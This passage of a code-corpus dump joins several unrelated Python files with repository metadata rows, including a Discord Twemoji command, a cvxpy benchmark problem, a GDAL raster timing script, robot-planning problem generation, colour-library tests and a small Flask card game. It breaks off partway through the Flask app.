        # checks `len(raw_emoji) == 0` before calling; confirm no other callers.
        raw_emoji = [emoji.lower() for emoji in raw_emoji]
        # Case 1: the first token is itself an emoji character. Encode each of
        # its component characters (handles combined/ZWJ sequences).
        if is_emoji(raw_emoji[0]):
            emojis = (Twemoji.codepoint(emoji) or "" for emoji in raw_emoji[0])
            return "-".join(emojis)
        # Case 2: tokens look like codepoints — rebuild the emoji character
        # and verify the result actually is one before re-encoding it.
        emoji = "".join(
            Twemoji.emoji(Twemoji.trim_code(code)) or "" for code in raw_emoji
        )
        if is_emoji(emoji):
            return "-".join(Twemoji.codepoint(e) or "" for e in emoji)
        raise ValueError("No codepoint could be obtained from the given input")
    @commands.command(aliases=("tw",))
    @whitelist_override(roles=(Roles.everyone,))
    async def twemoji(self, ctx: commands.Context, *raw_emoji: str) -> None:
        """Sends a preview of a given Twemoji, specified by codepoint or emoji."""
        # No argument given: show the command's help text instead of letting
        # codepoint_from_input fail on an empty tuple.
        if len(raw_emoji) == 0:
            await invoke_help_command(ctx)
            return
        try:
            codepoint = self.codepoint_from_input(raw_emoji)
        except ValueError:
            # Surface a user-facing error through the framework's handler.
            raise commands.BadArgument(
                "please include a valid emoji or emoji codepoint."
            )
        await ctx.send(embed=self.build_embed(codepoint))
def setup(bot: Bot) -> None:
    """Load the Twemoji cog."""
    # Extension entry point — presumably invoked by the bot framework's
    # load_extension mechanism (confirm against the project's bot setup).
    bot.add_cog(Twemoji(bot))
| 34.066225 | 110 | 0.614891 |
c916bd42a9f49b86089b3c70e101b95ec26db97d | 198 | py | Python | Lecture 28/Lecture28HWAssignment4.py | AtharvaJoshi21/PythonPOC | 6b95eb5bab7b28e9811e43b39e863faf2ee7565b | [
"MIT"
] | 1 | 2019-04-27T15:37:04.000Z | 2019-04-27T15:37:04.000Z | Lecture 28/Lecture28HWAssignment4.py | AtharvaJoshi21/PythonPOC | 6b95eb5bab7b28e9811e43b39e863faf2ee7565b | [
"MIT"
] | null | null | null | Lecture 28/Lecture28HWAssignment4.py | AtharvaJoshi21/PythonPOC | 6b95eb5bab7b28e9811e43b39e863faf2ee7565b | [
"MIT"
] | 1 | 2020-08-14T06:57:08.000Z | 2020-08-14T06:57:08.000Z | # WAP to accept a filename from user and print all words starting with capital letters.
def main():
    """Prompt for a file name and print every word that starts with a capital letter.

    Implements the exercise stated at the top of the file; the original body
    only read the file name and never performed the actual task.
    """
    inputFilePath = input("Please enter file name: ")
    with open(inputFilePath) as infile:
        # Words are whitespace-separated tokens; print those whose first
        # character is uppercase.
        for word in infile.read().split():
            if word and word[0].isupper():
                print(word)

if __name__ == "__main__":
    main()
c916da29a2d83f2c59eacc745d8499ef2a44d2e6 | 1,215 | py | Python | tests/python-playground/least_abs_dev_0.py | marcocannici/scs | 799a4f7daed4294cd98c73df71676195e6c63de4 | [
"MIT"
] | 25 | 2017-06-30T15:31:33.000Z | 2021-04-21T20:12:18.000Z | tests/python-playground/least_abs_dev_0.py | marcocannici/scs | 799a4f7daed4294cd98c73df71676195e6c63de4 | [
"MIT"
] | 34 | 2017-06-07T01:18:17.000Z | 2021-04-24T09:44:00.000Z | tests/python-playground/least_abs_dev_0.py | marcocannici/scs | 799a4f7daed4294cd98c73df71676195e6c63de4 | [
"MIT"
] | 13 | 2017-06-07T01:16:09.000Z | 2021-06-07T09:12:56.000Z | # This is automatically-generated code.
# Uses the jinja2 library for templating.
import cvxpy as cp
import numpy as np
import scipy as sp
# setup
problemID = "least_abs_dev_0"
prob = None
opt_val = None
# Variable declarations
import scipy.sparse as sps
# Fixed seed keeps the generated problem instance reproducible.
np.random.seed(0)
m = 5000
n = 200
# Random design matrix with unit-norm columns.
A = np.random.randn(m,n);
A = A*sps.diags([1 / np.sqrt(np.sum(A**2, 0))], [0])
# Synthetic observations: linear model plus a shared intercept term.
b = A.dot(10*np.random.randn(n) + 5*np.random.randn(1))
# Corrupt ~2% of the observations with large outliers (the L1 objective
# below is exactly what makes the fit robust to these).
k = max(m//50, 1)
idx = np.random.randint(0, m, k)
b[idx] += 100*np.random.randn(k)
# Problem construction
x = cp.Variable(n)
v = cp.Variable(1)
# Least absolute deviations: minimize ||A x + v*1 - b||_1.
prob = cp.Problem(cp.Minimize(cp.norm1(A*x + v*np.ones(m) - b)))
# Problem collection
# Single problem collection
problemDict = {
    "problemID" : problemID,
    "problem" : prob,
    "opt_val" : opt_val
}
problems = [problemDict]
# For debugging individual problems:
if __name__ == "__main__":
    def printResults(problemID = "", problem = None, opt_val = None):
        # Solve and report status/objective; opt_val is None for this instance.
        print(problemID)
        problem.solve()
        print("\tstatus: {}".format(problem.status))
        print("\toptimal value: {}".format(problem.value))
        print("\ttrue optimal value: {}".format(opt_val))
    printResults(**problems[0])
| 18.409091 | 69 | 0.650206 |
c9188684a1a8b8220b62b9249ea8815fc31f7412 | 2,621 | py | Python | experimentations/20-climate-data/test-perf.py | Kitware/spark-mpi-experimentation | 9432b63130059fc54843bc5ca6f2f5510e5a4098 | [
"BSD-3-Clause"
] | 4 | 2017-06-15T16:36:01.000Z | 2021-12-25T09:13:22.000Z | experimentations/20-climate-data/test-perf.py | Kitware/spark-mpi-experimentation | 9432b63130059fc54843bc5ca6f2f5510e5a4098 | [
"BSD-3-Clause"
] | 1 | 2018-09-28T23:32:42.000Z | 2018-09-28T23:32:42.000Z | experimentations/20-climate-data/test-perf.py | Kitware/spark-mpi-experimentation | 9432b63130059fc54843bc5ca6f2f5510e5a4098 | [
"BSD-3-Clause"
] | 6 | 2017-07-22T00:10:00.000Z | 2021-12-25T09:13:11.000Z | from __future__ import print_function
import os
import sys
import time
import gdal
import numpy as np
# -------------------------------------------------------------------------
# Files to process
# -------------------------------------------------------------------------
# GeoTIFF rasters to benchmark, one per year (NASA NEX-GDDP daily max
# temperature, MRI-CGCM3 model, RCP8.5 scenario — inferred from the names;
# TODO confirm against the dataset source).
fileNames = [
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2006.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2007.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2008.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2009.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2010.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2011.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2012.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2013.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2014.tif',
    'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2015.tif',
]
# Absolute directory holding the rasters above.
basepath = '/data/sebastien/SparkMPI/data/gddp'
# -------------------------------------------------------------------------
# Read file and output (year|month, temp)
# -------------------------------------------------------------------------
def readFile(fileName):
    """Yield (year, cell_value) for every raster cell of the named GeoTIFF.

    The year is parsed from the trailing ``_<year>.tif`` part of the file
    name; every band of the dataset is read in turn.
    """
    year = fileName.split('_')[-1][:-4]
    print('year', year)
    dataset = gdal.Open('%s/%s' % (basepath, fileName))
    # GDAL band indices are 1-based.
    for band_index in range(1, dataset.RasterCount + 1):
        cells = dataset.GetRasterBand(band_index).ReadAsArray()
        for cell in cells.flatten():
            yield (year, cell)
# -----------------------------------------------------------------------------
def readFileAndCompute(fileName):
    """Return (year, mean) over the valid raster cells of the named GeoTIFF.

    The year is parsed from the trailing ``_<year>.tif`` of the file name.
    Cell values >= 50000 are treated as no-data sentinels and excluded from
    the mean (TODO confirm the sentinel against the dataset's metadata).
    Returns (year, nan) when no valid cell exists — the original divided
    unconditionally and crashed with ZeroDivisionError in that case.
    """
    year = fileName.split('_')[-1][:-4]
    print('year', year)
    dataset = gdal.Open('%s/%s' % (basepath, fileName))
    total = 0.0
    count = 0
    for bandId in range(dataset.RasterCount):
        band = dataset.GetRasterBand(bandId + 1).ReadAsArray()
        # Vectorized mask instead of the original per-cell Python loop.
        valid = band[band < 50000]
        total += float(valid.sum())
        count += valid.size
    if count == 0:
        return (year, float('nan'))
    return (year, total / count)
# -----------------------------------------------------------------------------
def readDoNothing(fileName):
    """Read every band of the named GeoTIFF and print its array shape.

    Used purely as an I/O benchmark: data is loaded but not processed.
    """
    year = fileName.split('_')[-1][:-4]
    print('year', year)
    dataset = gdal.Open('%s/%s' % (basepath, fileName))
    # GDAL band indices are 1-based.
    for band_index in range(1, dataset.RasterCount + 1):
        band = dataset.GetRasterBand(band_index).ReadAsArray()
        print(band.shape)
# -------------------------------------------------------------------------
# Read timing
# -------------------------------------------------------------------------
# Wall-clock the pure read path (readDoNothing) across all input files.
t0 = time.time()
for fileName in fileNames:
    readDoNothing(fileName)
t1 = time.time()
print('### Total execution time - %s ' % str(t1 - t0))
| 33.177215 | 79 | 0.518123 |
c9195aa10c6d748883a1b2125a3a031fa6170f06 | 1,380 | py | Python | deluca/envs/lung/__init__.py | AlexanderJYu/deluca | 9e8b0d84d2eb0a58ff82a951b42881bdb2dc9f00 | [
"Apache-2.0"
] | null | null | null | deluca/envs/lung/__init__.py | AlexanderJYu/deluca | 9e8b0d84d2eb0a58ff82a951b42881bdb2dc9f00 | [
"Apache-2.0"
] | null | null | null | deluca/envs/lung/__init__.py | AlexanderJYu/deluca | 9e8b0d84d2eb0a58ff82a951b42881bdb2dc9f00 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO
# - interp smh
import jax.numpy as jnp
from deluca import JaxObject
# Default (low, high) pressure bounds of the waveform.
DEFAULT_PRESSURE_RANGE = (5.0, 35.0)
# Default breakpoint times; the last entry is also the breath period.
DEFAULT_KEYPOINTS = [1e-8, 1.0, 1.5, 3.0]
class BreathWaveform(JaxObject):
    """Waveform generator with shape /‾\_"""
    def __init__(self, range=None, keypoints=None):
        # `range` shadows the builtin, kept for interface compatibility.
        # Falsy values fall back to the module defaults.
        self.lo, self.hi = range or DEFAULT_PRESSURE_RANGE
        self.xp = jnp.asarray([0] + (keypoints or DEFAULT_KEYPOINTS))
        # fp pairs with xp: rise to hi, hold, drop back to lo, hold.
        # NOTE(review): assumes exactly 4 keypoints (5 values) — custom
        # keypoints of another length would mismatch fp; confirm callers.
        self.fp = jnp.asarray([self.lo, self.hi, self.hi, self.lo, self.lo])
        self.period = self.xp[-1]
    def at(self, t):
        # return jnp.interp(t, self.xp, self.fp, period=self.period)
        # HACK: period hardcoded to 3 (matches DEFAULT_KEYPOINTS[-1]); the
        # commented line above suggests passing self.period failed — TODO
        # confirm and generalize for non-default keypoints.
        return jnp.interp(t, self.xp, self.fp, period=3)
    def phase(self, t):
        # Index of the waveform segment containing time t (mod one period).
        return jnp.searchsorted(self.xp, t % self.period, side="right")
__all__ = ["BreathWaveform"]
| 32.857143 | 76 | 0.695652 |
c91a77c07622a3736aa47e0888f81515c8655b66 | 746 | py | Python | ivoire/__init__.py | Julian/Ivoire | af3f4ac77daf9d6c5167ef8a906557cc9d1d0ba7 | [
"MIT"
] | 9 | 2015-02-05T12:16:47.000Z | 2022-02-04T07:48:23.000Z | ivoire/__init__.py | Julian/Ivoire | af3f4ac77daf9d6c5167ef8a906557cc9d1d0ba7 | [
"MIT"
] | 1 | 2018-02-11T16:31:36.000Z | 2018-02-11T16:31:36.000Z | ivoire/__init__.py | Julian/Ivoire | af3f4ac77daf9d6c5167ef8a906557cc9d1d0ba7 | [
"MIT"
] | null | null | null | """
Ivoire is an RSpec-like testing framework for Python.
Globals defined in this module:
current_result: Should be set by a runner to an object that has the same
interface as unittest.TestResult. It will be used by every
example that is instantiated to record test results during
the runtime of Ivoire.
__version__: The current version information
"""
# importlib.metadata is stdlib from Python 3.8; older interpreters use the
# importlib_metadata backport under the same local name.
try:
    from importlib import metadata
except ImportError:
    import importlib_metadata as metadata
from ivoire.standalone import Example, describe
from ivoire.manager import ContextManager
# Version is read from the installed distribution's metadata.
__version__ = metadata.version("ivoire")
# Single shared context manager; `context` is the public factory alias.
_manager = ContextManager()
context = _manager.create_context
# Set by a runner at runtime (see the module docstring above).
current_result = None
| 26.642857 | 78 | 0.727882 |
c91fcc058836389aa81c0420f1fedf01f1106ff3 | 1,699 | py | Python | similarity.py | Blair-Johnson/faceswap | 79b75f7f112acb3bf6b228116facc4d0812d2099 | [
"MIT"
] | null | null | null | similarity.py | Blair-Johnson/faceswap | 79b75f7f112acb3bf6b228116facc4d0812d2099 | [
"MIT"
] | null | null | null | similarity.py | Blair-Johnson/faceswap | 79b75f7f112acb3bf6b228116facc4d0812d2099 | [
"MIT"
] | 1 | 2021-11-04T08:21:07.000Z | 2021-11-04T08:21:07.000Z | # Blair Johnson 2021
from facenet_pytorch import InceptionResnetV1, MTCNN
import numpy as np
def create_embeddings(images):
    '''
    Take an iterable of image candidates and return an iterable of image embeddings.
    '''
    # Accept a single image as well as a list of images.
    if type(images) != list:
        images = [images]
    # MTCNN crops the face region; InceptionResnetV1 (VGGFace2 weights, eval
    # mode) encodes it into an embedding tensor.
    extractor = MTCNN()
    encoder = InceptionResnetV1(pretrained='vggface2').eval()
    embeddings = []
    for image in images:
        # NOTE(review): assumes the extractor finds a face — cropped_img is
        # None otherwise and unsqueeze would fail; confirm inputs contain faces.
        cropped_img = extractor(image)
        # unsqueeze(0) adds the batch dimension expected by the encoder.
        embeddings.append(encoder(cropped_img.unsqueeze(0)))
    return embeddings
def candidate_search(candidates, target):
    '''
    Take a list of candidate images and a target image; return the candidate
    whose face embedding is closest to the target's, as (image, index).

    Bug fix: the original returned `candidates[i]` — the *last* loop index —
    instead of the best-matching candidate's index. Raises ValueError when
    `candidates` is empty (the original crashed indexing with np.inf).
    '''
    cand_embs = create_embeddings(candidates)
    target_emb = create_embeddings(target)[0].detach().numpy()
    best_loss = np.inf
    best_candidate = None
    for i, embedding in enumerate(cand_embs):
        # Frobenius norm of the embedding difference as the match distance.
        loss = np.linalg.norm(target_emb - embedding.detach().numpy(), ord='fro')
        if loss < best_loss:
            best_loss = loss
            best_candidate = i
    if best_candidate is None:
        raise ValueError("candidate_search requires at least one candidate")
    return candidates[best_candidate], best_candidate
if __name__ == '__main__':
    from PIL import Image
    import matplotlib.pyplot as plt
    # Ad-hoc smoke test with local images; paths are machine-specific.
    test1 = np.array(Image.open('/home/bjohnson/Pictures/fake_face.jpg'))
    test2 = np.array(Image.open('/home/bjohnson/Pictures/old_face.jpg'))
    test3 = np.array(Image.open('/home/bjohnson/Pictures/young_face.jpg'))
    target = np.array(Image.open('/home/bjohnson/Pictures/profile_pic_lake_louise.png'))
    candidates = [test1,test2,test3]
    # Report only the index of the best-matching candidate.
    chosen, index = candidate_search(candidates, target)
    print(index)
| 29.807018 | 97 | 0.683343 |
c920d8ceac18d8c9ff46fde63a7fa287e05e877b | 6,075 | py | Python | opentamp/domains/robot_manipulation_domain/generate_base_prob.py | Algorithmic-Alignment-Lab/openTAMP | f0642028d551d0436b3a3dbc3bfb2f23a00adc14 | [
"MIT"
] | 4 | 2022-02-13T15:52:18.000Z | 2022-03-26T17:33:13.000Z | opentamp/domains/robot_manipulation_domain/generate_base_prob.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | 1 | 2022-02-13T22:48:09.000Z | 2022-02-13T22:48:09.000Z | opentamp/domains/robot_manipulation_domain/generate_base_prob.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | from IPython import embed as shell
import itertools
import numpy as np
import random
# SEED = 1234
# Number of problem files to generate and number of cloth objects per problem.
NUM_PROBS = 1
NUM_CLOTH = 4
# Output path for the generated problem instance.
filename = "probs/base_prob.prob"
GOAL = "(RobotAt baxter robot_end_pose)"
# init Baxter pose
BAXTER_INIT_POSE = [0, 0, 0]
BAXTER_END_POSE = [0, 0, 0]
# 7-DOF arm joint angles; the commented values are earlier hand-tuned poses.
R_ARM_INIT = [0, 0, 0, 0, 0, 0, 0] # [0, -0.8436, -0.09, 0.91, 0.043, 1.5, -0.05] # [ 0.1, -1.36681967, -0.23718529, 1.45825713, 0.04779009, 1.48501637, -0.92194262]
L_ARM_INIT = [0, 0, 0, 0, 0, 0, 0] # [-0.6, -1.2513685 , -0.63979997, 1.41307933, -2.9520384, -1.4709618, 2.69274026]
# Gripper aperture values (meters — TODO confirm units).
OPEN_GRIPPER = [0.02]
CLOSE_GRIPPER = [0.015]
MONITOR_LEFT = [np.pi/4, -np.pi/4, 0, 0, 0, 0, 0]
MONITOR_RIGHT = [-np.pi/4, -np.pi/4, 0, 0, 0, 0, 0]
CLOTH_ROT = [0, 0, 0]
# Table half-extents, position, and rotation used for the Obstacle entry.
TABLE_GEOM = [1.23/2, 2.45/2, 0.97/2]
TABLE_POS = [1.23/2-0.1, 0, 0.97/2-0.375-0.665]
TABLE_ROT = [0,0,0]
ROBOT_DIST_FROM_TABLE = 0.05
# Angular regions (radians) around the robot base.
REGION1 = [np.pi/4]
REGION2 = [0]
REGION3 = [-np.pi/4]
REGION4 = [-np.pi/2]
# Initial cloth poses: every coordinate starts at 0.615.
cloth_init_poses = np.ones((NUM_CLOTH, 3)) * 0.615
cloth_init_poses = cloth_init_poses.tolist()
def get_baxter_pose_str(name, LArm = L_ARM_INIT, RArm = R_ARM_INIT, G = OPEN_GRIPPER, Pos = BAXTER_INIT_POSE):
    """Return the Init-section attribute string for a BaxterPose symbol.

    Emits comma-terminated "(attr name value)" entries for both arms, both
    grippers, and the base value, in the order the .prob grammar expects.
    """
    attrs = (
        ("left", LArm),
        ("left_gripper", G),
        ("right", RArm),
        ("right_gripper", G),
        ("value", Pos),
    )
    return "".join("({} {} {}), ".format(attr, name, val) for attr, val in attrs)
def get_baxter_str(name, LArm = L_ARM_INIT, RArm = R_ARM_INIT, G = OPEN_GRIPPER, Pos = BAXTER_INIT_POSE):
    """Return the Init-section attribute string for the Baxter robot object.

    Like get_baxter_pose_str, but also emits the robot's (geom ...) entry and
    uses the attribute name ``pose`` rather than ``value``.
    """
    s = ""
    # Bug fix: the original emitted "(geom name)" with no trailing ", ",
    # fusing it with the following "(left ...)" entry; every other attribute
    # written into the generated .prob file is comma-separated.
    s += "(geom {}), ".format(name)
    s += "(left {} {}), ".format(name, LArm)
    s += "(left_gripper {} {}), ".format(name, G)
    s += "(right {} {}), ".format(name, RArm)
    s += "(right_gripper {} {}), ".format(name, G)
    s += "(pose {} {}), ".format(name, Pos)
    return s
def get_undefined_robot_pose_str(name):
    """Return an attribute string marking every field of a BaxterPose as undefined.

    Mirrors get_baxter_pose_str, but each attribute value is the literal
    token ``undefined`` so the planner treats the pose as a free symbol.
    """
    fields = ("left", "left_gripper", "right", "right_gripper", "value")
    return "".join("({} {} undefined), ".format(field, name) for field in fields)
def get_undefined_symbol(name):
    """Return an attribute string marking a symbol's value and rotation undefined."""
    parts = [
        "(value {} undefined), ".format(name),
        "(rotation {} undefined), ".format(name),
    ]
    return "".join(parts)
def main():
    """Generate the base problem file: object declarations, Init facts, and Goal."""
    for iteration in range(NUM_PROBS):
        # --- Objects section: declare every symbol used in the problem. ---
        s = "# AUTOGENERATED. DO NOT EDIT.\n# Configuration file for CAN problem instance. Blank lines and lines beginning with # are filtered out.\n\n"
        s += "# The values after each attribute name are the values that get passed into the __init__ method for that attribute's class defined in the domain configuration.\n"
        s += "Objects: "
        s += "Baxter (name baxter); "
        for i in range(NUM_CLOTH):
            # NOTE(review): ".format(i)" on the grasp/putdown pose names is a
            # no-op (no placeholder), so all cloths share the same four pose
            # symbols — confirm this is intended.
            s += "Cloth (name {}); ".format("cloth{0}".format(i))
            s += "ClothTarget (name {}); ".format("cloth_target_{0}".format(i))
            s += "ClothTarget (name {}); ".format("cloth{0}_init_target".format(i))
            s += "ClothTarget (name {}); ".format("cloth{0}_end_target".format(i))
            s += "BaxterPose (name {}); ".format("cloth_grasp_begin".format(i))
            s += "BaxterPose (name {}); ".format("cloth_grasp_end".format(i))
            s += "BaxterPose (name {}); ".format("cloth_putdown_begin".format(i))
            s += "BaxterPose (name {}); ".format("cloth_putdown_end".format(i))
        s += "ClothTarget (name {}); ".format("middle_target_1")
        s += "ClothTarget (name {}); ".format("middle_target_2")
        s += "ClothTarget (name {}); ".format("left_mid_target")
        s += "ClothTarget (name {}); ".format("right_mid_target")
        s += "BaxterPose (name {}); ".format("robot_init_pose")
        s += "BaxterPose (name {}); ".format("robot_end_pose")
        s += "Obstacle (name {}) \n\n".format("table")
        # --- Init section: concrete values / undefined markers per symbol. ---
        s += "Init: "
        for i in range(NUM_CLOTH):
            s += "(geom cloth{0}), ".format(i)
            s += "(pose cloth{0} {1}), ".format(i, [0, 0, 0])
            s += "(rotation cloth{0} {1}), ".format(i, [0, 0, 0])
            s += "(value cloth{0}_init_target [0, 0, 0]), ".format(i)
            s += "(rotation cloth{0}_init_target [0, 0, 0]), ".format(i)
            s += "(value cloth_target_{0} [0, 0, 0]), ".format(i)
            s += "(rotation cloth_target_{0} [0, 0, 0]), ".format(i)
            s += "(value cloth{0}_end_target [0, 0, 0]), ".format(i)
            s += "(rotation cloth{0}_end_target [0, 0, 0]), ".format(i)
        s += "(value middle_target_1 [0, 0, 0]), "
        s += "(rotation middle_target_1 [0, 0, 0]), "
        s += "(value middle_target_2 [0, 0, 0]), "
        s += "(rotation middle_target_2 [0, 0, 0]), "
        s += "(value left_mid_target [0, 0, 0]), "
        s += "(rotation left_mid_target [0, 0, 0]), "
        s += "(value right_mid_target [0, 0, 0]), "
        s += "(rotation right_mid_target [0, 0, 0]), "
        # Grasp/putdown poses are left undefined for the solver to fill in.
        s += get_undefined_robot_pose_str("cloth_grasp_begin".format(i))
        s += get_undefined_robot_pose_str("cloth_grasp_end".format(i))
        s += get_undefined_robot_pose_str("cloth_putdown_begin".format(i))
        s += get_undefined_robot_pose_str("cloth_putdown_end".format(i))
        s += get_baxter_str('baxter', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_INIT_POSE)
        s += get_baxter_pose_str('robot_init_pose', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_INIT_POSE)
        # s += get_baxter_pose_str('robot_end_pose', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_END_POSE)
        s += get_undefined_robot_pose_str('robot_end_pose')
        s += "(geom table {}), ".format(TABLE_GEOM)
        s += "(pose table {}), ".format(TABLE_POS)
        s += "(rotation table {}); ".format(TABLE_ROT)
        # Initial-state predicates.
        s += "(RobotAt baxter robot_init_pose),"
        s += "(StationaryBase baxter), "
        s += "(IsMP baxter), "
        s += "(WithinJointLimit baxter), "
        s += "(StationaryW table) \n\n"
        s += "Goal: {}".format(GOAL)
        # NOTE(review): every iteration writes the same `filename`, so with
        # NUM_PROBS > 1 earlier files would be overwritten — confirm intended.
        with open(filename, "w") as f:
            f.write(s)
if __name__ == "__main__":
    main()
| 41.047297 | 175 | 0.576461 |
c9210c12cb167b3a01782592accbb83cee14ae03 | 2,633 | py | Python | tests/views/test_hsva.py | ju-sh/colorviews | b9757dd3a799d68bd89966852f36f06f21e36072 | [
"MIT"
] | 5 | 2021-06-10T21:12:16.000Z | 2022-01-14T05:04:03.000Z | tests/views/test_hsva.py | ju-sh/colorviews | b9757dd3a799d68bd89966852f36f06f21e36072 | [
"MIT"
] | null | null | null | tests/views/test_hsva.py | ju-sh/colorviews | b9757dd3a799d68bd89966852f36f06f21e36072 | [
"MIT"
] | null | null | null | import pytest
from colorviews import AlphaColor
class TestGetAttr:
    """Attribute reads on the HSVA view of an AlphaColor."""
    @pytest.mark.parametrize("attr, expected", [
        ("h", 0.75),
        ("s", 0.47),
        ("v", 0.29),
        ("a", 0.79),
    ])
    def test_valid(self, attr, expected):
        # Each HSVA component should round-trip through from_hsva.
        color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
        assert round(getattr(color.hsva, attr), 4) == expected
    @pytest.mark.parametrize("attr", [
        "r", "b",
    ])
    def test_invalid(self, attr):
        # RGB component names must not be readable on the HSVA view.
        color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
        with pytest.raises(AttributeError):
            getattr(color.hsva, attr)
class TestSetAttr:
    """Attribute writes on the HSVA view of an AlphaColor."""
    @pytest.mark.parametrize("attr, val", [
        ("h", 0.75),
        ("s", 0.5),
        ("v", 0.29),
        ("a", 0.49),
    ])
    def test_valid(self, attr, val):
        # Setting a component should be observable on re-read.
        color = AlphaColor.from_hsva(0.45, 0.15, 0.89, 0.79)
        setattr(color.hsva, attr, val)
        assert round(getattr(color.hsva, attr), 4) == val
    @pytest.mark.parametrize("attr", [
        "r", "g",
    ])
    def test_invalid(self, attr):
        # RGB component names must not be writable on the HSVA view.
        color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
        with pytest.raises(AttributeError):
            setattr(color.hsva, attr, 0.1)
# replace() should yield a new color with only the named components changed;
# expected values are the full RGBA integers of the resulting color.
@pytest.mark.parametrize("hsva_dict, expected", [
    ({"h": 91 / 360}, 0x394a2980),
    ({"s": 0.15}, 0x443f4a80),
    ({"v": 0.74}, 0x9268bd80),
    ({"a": 0.80}, 0x39294acc),
    ({"h": 91 / 360, "s": 0.15}, 0x444a3f80),
    ({"h": 91 / 360, "v": 0.74}, 0x91bd6880),
    ({"h": 91 / 360, "v": 0.74, "a": 0.25}, 0x91bd6840),
    ({"s": 0.15, "v": 0.74}, 0xafa0bd80),
    ({"h": 91 / 360, "s": 0.15, "v": 0.74}, 0xaebda080),
])
def test_replace(hsva_dict, expected):
    color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.5)
    assert int(color.hsva.replace(**hsva_dict)) == expected
class TestVals:
    """Bulk assignment through the `vals` property of the HSVA view."""
    @pytest.mark.parametrize("vals", [
        [0.2, 0.4, 0.6, 0.1],
        (0.6, 0.2, 0.4, 0.54),
    ])
    def test_setter_valid(self, vals):
        # Both lists and tuples of four components are accepted.
        color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
        color.hsva.vals = vals
        assert [round(val, 4) for val in color.hsva] == list(vals)
    @pytest.mark.parametrize("wrong_vals", [
        [0.2, 0.4],
        (1.6, 0.2, 0.4),
        (0.6, 0.2, 0.4, 1.0, 0.8),
    ])
    def test_setter_invalid(self, wrong_vals):
        # Wrong length or out-of-range components must raise ValueError.
        color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
        with pytest.raises(ValueError):
            color.hsva.vals = wrong_vals
def test_vals_getter():
    """Reading `vals` returns all four HSVA components as set at construction."""
    vals = (0.75, 0.45, 0.29, 0.79)
    color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
    assert [round(val, 4) for val in color.hsva.vals] == list(vals)
| 29.920455 | 67 | 0.545765 |
c92170ef42c7d1d4c09bcc11c88becf053c48250 | 2,645 | py | Python | app/__init__.py | Cinquiom/fifty-cents-frontend | 946f564a87127f5820111321cd48441cc414d277 | [
"MIT"
] | null | null | null | app/__init__.py | Cinquiom/fifty-cents-frontend | 946f564a87127f5820111321cd48441cc414d277 | [
"MIT"
] | null | null | null | app/__init__.py | Cinquiom/fifty-cents-frontend | 946f564a87127f5820111321cd48441cc414d277 | [
"MIT"
] | null | null | null | import random, logging
from collections import Counter
from flask import Flask, session, request, render_template, jsonify
from app.util import unflatten
from app.fiftycents import FiftyCentsGame
from app.fiftycents import Card
# Silence werkzeug's per-request INFO logging.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
app = Flask(__name__)
# SECURITY NOTE(review): hardcoded session secret committed to source —
# should come from configuration/environment in any real deployment.
app.secret_key = 'peanut'
# Single module-level game instance shared by all requests (not safe for
# concurrent users — TODO confirm single-player assumption).
game = FiftyCentsGame(2)
@app.route("/", methods=['POST', 'GET'])
def index():
    """Render the main game page; a POST applies the submitted play first."""
    if request.method == "POST":
        # Form fields arrive flattened ("play.K"); unflatten rebuilds the
        # nested dict, then card counts are coerced to ints.
        data = unflatten(request.form.to_dict())
        for k,v in data["play"].items():
            data["play"][k] = int(v)
        game.play(data)
    # Start every rank at 0 so the template always sees a full hand map.
    player = {"hand": {k: 0 for k in Card.RANKS},
              "coins": game.player.coins,
              "points": game.player.total_score}
    # Overlay the actual counts of ranks currently held.
    for k, v in dict(Counter([c.rank for c in game.player.hand])).items():
        player["hand"][k] = v
    # current_round is (number of sets, set size) — inferred from usage.
    goal = {"set_num": game.current_round[0],
            "set_size": game.current_round[1]}
    pile = [c.rank for c in game.open_deck.cards]
    return render_template('main.html',
                           player=player,
                           pile=pile,
                           goal=goal,
                           playable = sorted([c for c in game.cards_in_play if c not in ["2", "JOKER"]]),
                           player_has_drawn=game.player_has_drawn,
                           game_over = game.game_over,
                           player_score = game.player.get_current_score(),
                           ai_score = game.AI.get_current_score(),
                           ai_total = game.AI.total_score)
@app.route("/info/", methods=['GET'])
def info():
    """Return the full game state (both players and shared piles) as JSON.

    NOTE(review): exposes the computer player's hand to the client — fine
    for debugging, but confirm it is not reachable in production play.
    """
    return jsonify({"player": {
                        "hand": [c.rank for c in game.player.hand],
                        "played": [c.rank for c in game.player.played_cards],
                        "coins": game.player.coins,
                        "score": game.player.get_current_score()
                    },
                    "computer": {
